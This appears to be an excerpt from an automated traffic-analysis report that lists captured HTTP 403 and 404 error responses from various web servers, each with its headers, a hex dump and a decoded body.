              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=25hrytDie500DMabDQULthQ5USoz9Zp2TnQNbrFxNVCvSGmAAp5WQp%2FYefEKQtNKo41Pbd5o7DTKrz%2FJBhTNRVaOS%2BAVFJp%2BtC%2FmQRtboIgy9QwL6X3u0bqxFPJP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7732ca1542c4-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:20 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 15 Sep 2023 05:28:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:20 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:20 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:28:21 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:22 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:28:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: 85008823-3c5a-463b-a690-62755292243cCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W5L2LNP6npcSq%2FMQ8ITEzOq9JOBPAYRoXmqG8L4kObOrTUlguyQn9GrKWPRqGtKtd%2FaZYXNAyjzvGrRWZiErD%2FShJ69LFD5NgMGvTP0TvIn5IRUSaZ55WAP9Qx7MWMA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=65.000057Server: cloudflareCF-RAY: 806e77462bdd3320-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:22 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:28:23 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 806e774f599c42c2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:27:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1229date: Fri, 15 Sep 2023 05:28:24 GMTserver: LiteSpeedx-hostname: ams111.yourwebhoster.comData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 